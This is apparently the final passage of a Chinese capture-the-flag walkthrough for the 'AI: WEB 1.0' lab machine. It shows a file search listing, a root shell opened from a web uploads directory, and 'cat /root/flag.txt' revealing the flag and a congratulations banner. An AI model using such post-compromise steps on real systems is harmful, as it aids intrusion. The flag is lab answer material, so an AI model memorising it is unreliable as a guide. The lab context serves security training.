/sys/kernel/debug/block/loop6/hctx0/flags
/sys/kernel/debug/block/loop5/hctx0/flags
/sys/kernel/debug/block/loop4/hctx0/flags
/sys/kernel/debug/block/loop3/hctx0/flags
/sys/kernel/debug/block/loop2/hctx0/flags
/sys/kernel/debug/block/loop1/hctx0/flags
/sys/kernel/debug/block/loop0/hctx0/flags
/sys/devices/pnp0/00:07/tty/ttyS1/flags
/sys/devices/pnp0/00:06/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS15/flags
/sys/devices/platform/serial8250/tty/ttyS6/flags
/sys/devices/platform/serial8250/tty/ttyS23/flags
/sys/devices/platform/serial8250/tty/ttyS13/flags
/sys/devices/platform/serial8250/tty/ttyS31/flags
/sys/devices/platform/serial8250/tty/ttyS4/flags
/sys/devices/platform/serial8250/tty/ttyS21/flags
/sys/devices/platform/serial8250/tty/ttyS11/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS28/flags
/sys/devices/platform/serial8250/tty/ttyS18/flags
/sys/devices/platform/serial8250/tty/ttyS9/flags
/sys/devices/platform/serial8250/tty/ttyS26/flags
/sys/devices/platform/serial8250/tty/ttyS16/flags
/sys/devices/platform/serial8250/tty/ttyS7/flags
/sys/devices/platform/serial8250/tty/ttyS24/flags
/sys/devices/platform/serial8250/tty/ttyS14/flags
/sys/devices/platform/serial8250/tty/ttyS5/flags
/sys/devices/platform/serial8250/tty/ttyS22/flags
/sys/devices/platform/serial8250/tty/ttyS12/flags
/sys/devices/platform/serial8250/tty/ttyS30/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS20/flags
/sys/devices/platform/serial8250/tty/ttyS10/flags
/sys/devices/platform/serial8250/tty/ttyS29/flags
/sys/devices/platform/serial8250/tty/ttyS19/flags
/sys/devices/platform/serial8250/tty/ttyS27/flags
/sys/devices/platform/serial8250/tty/ttyS17/flags
/sys/devices/platform/serial8250/tty/ttyS8/flags
/sys/devices/platform/serial8250/tty/ttyS25/flags
/sys/devices/pci0000:00/0000:00:11.0/0000:02:00.0/net/ens32/flags
/sys/devices/virtual/net/lo/flags
/root/flag.txt
root@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads# cat /root/flag.txt
<o2sdf92213/se3reTdir777/uploads# cat /root/flag.txt
####################################################
# #
# AI: WEB 1.0 #
# #
# Congratulation!!! #
# #
# Thank you for penetrate my system. #
# #
# Hope you enjoyed this. #
# #
# #
# flag{cbe5831d864cbc2a104e2c2b9dfb50e5acbdee71} #
# #
####################################################
root@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads#
通过cat /root/flag.txt–得到flag为flag{cbe5831d864cbc2a104e2c2b9dfb50e5acbdee71}
声明
本文内容仅代表作者观点,或转载于其他网站,本站不以此文作为商业用途
如有涉及侵权,请联系本站进行删除
转载本站原创文章,请注明来源及作者。